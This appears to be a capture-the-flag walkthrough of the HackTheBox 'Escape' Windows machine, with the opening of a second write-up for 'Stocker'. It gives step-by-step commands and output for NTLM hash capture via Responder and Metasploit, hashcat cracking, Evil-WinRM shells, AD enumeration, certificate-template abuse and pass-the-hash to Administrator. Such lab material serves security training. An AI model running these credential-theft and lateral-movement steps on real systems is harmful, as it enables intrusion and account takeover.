└─$ sudo responder -I tun0
[sudo] password for in7rud3r:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.111]
Responder IPv6 [dead:beef:2::106d]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-IM2J35A52MX]
Responder Domain Name [GFB0.LOCAL]
Responder DCE-RPC Port [47501]
[+] Listening for events...
…let’s take advantage of one of the Metasploit Framework exploits…
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ msfconsole
______________________________________
/ it looks like you're trying to run a
module /
--------------------------------------
__
/
| |
@ @
| |
|| |/
|| ||
|_/|
___/
=[ metasploit v6.3.4-dev ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use help <command> to learn more
about any command
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > options
Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
SMBPROXY 0.0.0.0 yes IP of SMB proxy or sniffer.
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set smbproxy 10.10.14.111
smbproxy => 10.10.14.111
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > exploit
[*] 10.10.11.202:1433 - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.11.202:1433 - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.111 via xp_dirtree...
[+] 10.10.11.202:1433 - Successfully executed xp_dirtree on 10.10.11.202
[+] 10.10.11.202:1433 - Go check your SMB relay or capture module for goodies!
[*] sequel.htb:1433 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
…and wait for the attacked service to fall into the trap.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ cat NTLMv2-SSP.hash
sql_svc::sequel:5162e1326254c61a:EC2BB7C31D6D9609BA2E60B95A70D405:0101000000000000801D5DFA205AD901072D8534397365F50000000002000800470046004200300001001E00570049004E002D0049004D0032004A00330035004100350032004D00580004003400570049004E002D0049004D0032004A00330035004100350032004D0058002E0047004600420030002E004C004F00430041004C000300140047004600420030002E004C004F00430041004C000500140047004600420030002E004C004F00430041004C0007000800801D5DFA205AD90106000400020000000800300030000000000000000000000000300000DF8773489E613E8360EB2D86BF5C2D8E833BD6F0CEFE259881A1240933E805980A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310031000000000000000000
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ hashcat -m 5600 NTLMv2-SSP.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
/sys/class/hwmon/hwmon4/temp1_input: No such file or directory
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU T8300 @ 2.40GHz, 1410/2885 MB (512 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba2e60b95a70d405:0101000000000000801d5dfa205ad901072d8534397365f50000000002000800470046004200300001001e00570049004e002d0049004d0032004a00330035004100350032004d00580004003400570049004e002d0049004d0032004a00330035004100350032004d0058002e0047004600420030002e004c004f00430041004c000300140047004600420030002e004c004f00430041004c000500140047004600420030002e004c004f00430041004c0007000800801d5dfa205ad90106000400020000000800300030000000000000000000000000300000df8773489e613e8360eb2d86bf5c2d8e833bd6f0cefe259881a1240933e805980a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000:REGGIE1234ronnie
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba...000000
Time.Started.....: Sun Mar 19 05:29:14 2023 (30 secs)
Time.Estimated...: Sun Mar 19 05:29:44 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 395.6 kH/s (1.09ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700288/14344385 (74.60%)
Rejected.........: 0/10700288 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REESY15987
Hardware.Mon.#1..: Util: 91%
Started: Sun Mar 19 05:27:49 2023
Stopped: Sun Mar 19 05:29:46 2023
And after some waiting and patience, the password comes out. What better tool to use than Evil-WinRM?
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Userssql_svcDocuments> whoami
sequelsql_svc
*Evil-WinRM* PS C:Userssql_svcDocuments> dir /users
Directory: C:users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
Obviously, this user can’t do much. You need a winPEAS session. We load the scanner on the BOX through the features made available by Evil-WinRM…
Below is the information extracted from the winPEAS scan that I deemed worthy of note.
[...]
[+] WSUS
[i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus
[...]
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
[...]
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Directory: C:Userssql_svcAppDataRoamingMicrosoftProtect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 11/19/2022 3:11 AM S-1-5-21-4078382237-1492182817-2568127209-1106
[...]
C:WindowsPanthersetupinfo
C:WindowsSystem32ntds.dit
C:WindowsSystem32configSAM
C:WindowsSystem32configSYSTEM
C:WindowsSystem32configRegBackSAM
C:WindowsSystem32configRegBackSYSTEM
[...]
Obviously, in addition to some interesting files, the possible privileges available to the user are highlighted (to verify actual vulnerabilities) and the WSUS windows update service (often used precisely for the elevation of privileges). Let’s try to understand if the WSUS is really vulnerable.
*Evil-WinRM* PS C:Userssql_svc> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svc> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svc> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
+ CategoryInfo : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
AUOptions REG_DWORD 0x3
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAUNoAutoUpdate
*Evil-WinRM* PS C:Userssql_svcDocuments>
Already from the windows registry keys, there doesn’t seem to be any hope. Even on the privileges front, nothing particularly attractive seems to be highlighted, the masterkey of the user Ryan would be needed, but at the moment it does not seem to be available. Let’s try some other tools, for example, PrivescCheck.
Also in this case I report only the interesting and noteworthy things.
[...]
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
| | parsing the registry. |
+------+-------------------------------------------------------+
[*] Found 6 result(s).
Name FullName
---- --------
Microsoft SQL Server C:Program Files (x86)Microsoft SQL Server
Microsoft C:Program FilesMicrosoft
Microsoft SQL Server C:Program FilesMicrosoft SQL Server
Microsoft Visual Studio 10.0 C:Program FilesMicrosoft Visual Studio 10.0
VMware C:Program FilesVMware
VMware Tools C:Program FilesVMwareVMware Tools
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? (info) | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes by |
| | parsing the registry. If this fails, the check will |
| | fall back to the built-in 'Get-HotFix' cmdlet. |
+------+-------------------------------------------------------+
[*] Found 9 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB5011551 Update NT AUTHORITYSYSTEM 2023-02-02 - 13:18:08
KB5011574 Update sequelAdministrator 2023-02-02 - 12:07:20
KB4512578 Security Update sequelAdministrator 2023-02-01 - 23:13:20
KB4589208 Update NT AUTHORITYSYSTEM 2023-02-01 - 21:10:30
KB5012170 Security Update sequelAdministrator 2023-02-01 - 21:00:27
KB5020374 Security Update NT AUTHORITYSYSTEM 2023-02-01 - 19:29:33
KB4512577 Security Update S-1-5-21-89493159-3068390195-4120627384-1047 2019-09-06 - 17:24:38
KB5020866 Update 1600-12-31 - 16:00:00
KB4514366 Update 1600-12-31 - 16:00:00
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and |
| | check whether a patch was applied in the last 31 |
| | days. |
[*] Found 1 result(s).
HotFixID Description InstalledBy InstalledOn
-------- ----------- ----------- -----------
KB5011551 Update NT AUTHORITYSYSTEM 2023-02-02 - 13:18:08
[...]
+------+------------------------------------------------+------+
| TEST | MISC > OS Version | INFO |
+------+------------------------------------------------+------+
| DESC | Print the detailed version number of the Operating |
| | System. If we can't get the update history, this |
| | might be useful. |
+------+-------------------------------------------------------+
[*] Found 1 result(s).
Name Version
---- -------
Windows Server 2019 Standard 10.0.17763 Version 1809 (17763.2746)
[...]
We get to a point where the use of classic windows tools becomes essential, let’s try bloodhound.
*Evil-WinRM* PS C:Userssql_svc> upload ./attack/upld/SharpHound.exe ../sh.exe
Info: Uploading ./attack/upld/SharpHound.exe to ../sh.exe
Data: 1402196 bytes of 1402196 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:Userssql_svc> ./sh.exe -c All --zipfilename output.zip
2023-03-25T23:50:54.5149380-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-03-25T23:50:54.6555838-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:54.6868023-07:00|INFORMATION|Initializing SharpHound at 11:50 PM on 3/25/2023
2023-03-25T23:50:55.0305487-07:00|INFORMATION|Loaded cache with stats: 56 ID to type mappings.
56 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-03-25T23:50:55.0461913-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:55.1868496-07:00|INFORMATION|Beginning LDAP search for sequel.htb
2023-03-25T23:50:55.2336792-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-03-25T23:50:55.2336792-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-03-25T23:51:25.2383915-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-03-25T23:51:39.5292927-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-03-25T23:51:39.5605157-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 42 MB RAM
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Enumeration finished in 00:00:44.4448376
2023-03-25T23:51:39.7011650-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
56 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2023-03-25T23:51:39.7167826-07:00|INFORMATION|SharpHound Enumeration Completed at 11:51 PM on 3/25/2023! Happy Graphing!
*Evil-WinRM* PS C:Userssql_svc> download ./20230325235139_output.zip ./attack/dwnl/20230325235139_output.zip
Info: Downloading ./20230325235139_output.zip to ./attack/dwnl/20230325235139_output.zip
Info: Download successful!
*Evil-WinRM* PS C:Userssql_svc>
…and analyze the result.
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ xhost +local:$(id -nu)
non-network local connections being added to access control list
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo docker run -it
-p 7474:7474
-p 7687:7687
-e DISPLAY=unix$DISPLAY
-v /tmp/.X11-unix:/tmp/.X11-unix
--device=/dev/dri:/dev/dri
-v ~/temp:/data
--network host
--name bloodhound belane/bloodhound
WARNING: Published ports are discarded when using host network mode
Selecting JVM - Version:11.0.16+8-post-Debian-1deb11u1, Name:OpenJDK 64-Bit Server VM, Vendor:Debian
Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
Directories in use:
home: /var/lib/neo4j
config: /etc/neo4j
logs: /var/log/neo4j
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses: /var/lib/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:84). It is available at http://localhost:7474
There may be a short delay until the server is ready.
*** Log in with bolt://127.0.0.1:7687 (neo4j:blood) ***
I use the containerized version, so wait for the availability of the Neo4j.
When logged in, upload the collected data (directly zip file). Now, on the search box, search for the user you pawn: sql_svc. Select it and mark the user as owned. Search for the Ryan user account and select it, right-click and chose “shortest path from owned to here“
Well, the path is long enough, but the tool crashes as soon as you try to investigate the third link. Nonetheless, the information from previous nodes highlights standard attacks that I’ve faced in the past. Let’s try them quickly.
*Evil-WinRM* PS C:Userssql_svcDocuments> cscript.exe missingkbs.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.
Windows Exploit Suggester: Missing KBs Identifier v1.0
https://github.com/bitsadmin/wesng/
cscript.exe : [-] This script needs to be executed as an elevated Administrator
+ CategoryInfo : NotSpecified: ([-] This script...d Administrator:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Exhausted and out of ideas, I abandon my goal for a few days (needless to tell us, when you slam too much on the same apparently unsolvable problem, disconnect… let your mind refresh, empty and face the problem again).
As you can see, I was stubborn in the search for an advanced exploit and my belief that the resolution depended on it did not take my eyes off a dead end in which I was closed for several days. But sometimes simplicity and banality are the most improbable and unexpected ways.
So I go back to the machine after a few days and with the memories of all the attempts tried up to that moment, I go back to having a look at the resources available from the shell. I then find a folder on the root containing what appears to be the SQL Server installation package and a couple of other directories one of which contains a backup file.
*Evil-WinRM* PS C:sqlserver> dir -force
Directory: C:sqlserver
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:sqlserver> cd logs
*Evil-WinRM* PS C:sqlserverlogs> dir -force
Directory: C:sqlserverlogs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
I start sifting through the log file and find two consecutive failed accesses within a few…. hundredths of a second (it seems a bit exaggerated to me, but we’ll stick to the clues).
*Evil-WinRM* PS C:sqlserverlogs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
[...]
2022-11-18 13:43:07.44 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htbRyan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[...]
All we have to do is reconnect with Evil-WinRM using the new credentials.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.202 - Escape (win)/attack/upld/sggstr]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersRyan.CooperDocuments> cd ..desktop
*Evil-WinRM* PS C:UsersRyan.Cooperdesktop> dir
Directory: C:UsersRyan.Cooperdesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/1/2023 4:23 PM 34 user.txt
*Evil-WinRM* PS C:UsersRyan.Cooperdesktop> type user.txt
f******************************5
And the first flag is captured. Ok, at this point the steps repeat as before. Unfortunately also in this case, nothing with winPEAS, nothing with BloodHound, nothing with PowerScript and Rubeus; another dead end.
As exhausted, I rely on the suggestions of the forum and thus discover a new (for me) interesting tool: “just download the Certify.exe“.
It looks really interesting, let’s see what comes out.
*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
________|_| __|_|_| __, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htbsequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTINAdministrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITYAuthenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTINAdministrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htbsequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelDomain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequelAdministrator S-1-5-21-4078382237-1492182817-2568127209-500
sequelDomain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequelEnterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:10.2338568
As in the example given in the git repository documentation, our user also seems to be enabled for the ManageCA privilege (but what a coincidence). Go on.
And we run straight to the root flag without delay, once again exploiting the potential of Evil-WinRM.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/--==## DONE ##==--]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersAdministratorDocuments> whoami
sequeladministrator
*Evil-WinRM* PS C:UsersAdministratorDocuments> type ../Desktop/root.txt
b4c008685abf917ffbf974fddb917a8a
*Evil-WinRM* PS C:UsersAdministratorDocuments>
And once again… that’s all folks, I sweated for a few days, but in the end, I managed to overcome every obstacle (even the most trivial ones, next time, look around before proceeding down the most impervious routes). For the moment, goodbye, but I’ll wait for you at the next BOX, happy hacking everyone!
Simple BOX on both flags, much more root than the user, still fun and great for beginners.
The nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-10 15:46 EST
Nmap scan report for 10.10.11.196
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3d12971d86bc161683608f4f06e6d54e (RSA)
| 256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_ 256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.85 seconds
It can be said that only port 80 of the portal is available. Directly towards the goal, then. Let’s put stocker.htb in the /et/hosts file and take a look at the portal. It seems to be an e-commerce portal (but there don’t seem to be any functional features), let’s immediately identify a possible user “Angoose Garden, Head of IT at Stockers Ltd“, keep that in mind. Let’s scan with dirb, looking for hidden routes.
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ wfuzz -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -H "Host: FUZZ.stocker.htb" --hh "178" http://stocker.htb/
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://stocker.htb/
Total requests: 5000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000019: 302 0 L 4 W 28 Ch "dev"
000002700: 400 7 L 12 W 166 Ch "m."
000002795: 400 7 L 12 W 166 Ch "ns2.cl.bellsouth.net."
000002883: 400 7 L 12 W 166 Ch "ns1.viviotech.net."
000002885: 400 7 L 12 W 166 Ch "ns2.viviotech.net."
000003050: 400 7 L 12 W 166 Ch "ns3.cl.bellsouth.net."
000004082: 400 7 L 12 W 166 Ch "jordan.fortwayne.com."
000004081: 400 7 L 12 W 166 Ch "ferrari.fortwayne.com."
000004083: 400 7 L 12 W 166 Ch "quatro.oweb.com."
Total time: 58.97300
Processed Requests: 5000
Filtered Requests: 4991
Requests/sec.: 84.78454
Bingo, let’s add dev.stocker.htb to the /etc/hosts file and browse the new portal. This time we find something, a login form, probably managed by a back-end in node.js.
